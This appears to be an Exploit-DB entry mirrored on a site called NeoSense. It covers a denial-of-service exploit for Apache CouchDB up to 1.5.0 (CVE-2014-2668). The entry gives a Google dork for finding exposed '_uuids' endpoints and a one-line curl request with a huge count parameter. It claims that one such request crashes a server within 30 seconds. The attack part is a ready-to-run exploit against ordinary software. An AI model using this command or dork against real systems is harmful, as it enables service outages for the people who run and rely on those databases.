[] NeoSense
E X P L O I T S
title author type platform port cve id

Apache CouchDB 1.5.0 - 'uuids' Denial of Service

Author: Krusty Hack
type: dos
platform: multiple
port: 
date_added: 2014-03-26 
date_updated: 2018-09-24 
verified: 1 
codes: CVE-2014-2668;OSVDB-105029 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt33000/screen-shot-2014-03-26-at-092427.png 
application_url: http://www.exploit-db.comapache-couchdb-1.5.0.tar.gz
# Exploit Title: Couchdb uuids DOS exploit
# Google Dork inurl: _uuids
# Date: 03/24/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://couchdb.apache.org/
# Software Link: http://couchdb.apache.org/
# Version: up to 1.5.0
# Tested on: Linux Couchdb up to 1.5.0

HOW TO
======
curl http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999

TEST
====
Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request.
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.